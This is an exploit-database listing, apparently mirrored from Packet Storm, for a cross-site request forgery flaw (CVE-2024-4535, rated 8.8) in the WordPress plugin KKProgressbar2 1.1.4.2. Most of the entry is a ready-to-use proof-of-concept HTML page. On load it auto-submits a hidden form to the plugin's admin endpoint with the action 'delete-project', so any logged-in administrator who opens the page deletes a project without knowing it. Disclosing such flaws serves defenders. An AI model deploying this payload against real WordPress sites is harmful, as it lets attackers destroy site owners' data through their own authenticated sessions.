PACKETSTORM 8.8 HIGH

📄 WordPress KKProgressbar2 1.1.4.2 Cross Site Request Forgery_PACKETSTORM:210192

8.8 / 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description

WordPress................................................
Visit Original Source

Basic Information

ID PACKETSTORM:210192
Published Oct 6, 2025 at 00:00

Affected Product

Affected Versions # Exploit Title: WordPress Plugin KKProgressbar2 - Cross-Site Request
Forgery (CSRF)
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2024-4535

POC:

<body onload="document.forms[0].submit()">
<form action="http:// target.com/wp-admin/admin.php?page=kkpb-menu"
method="post">
<input type="hidden" name="action" value="delete-project">
<input type="hidden" name="id" value="<<ID>>">
</form>
</body>

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.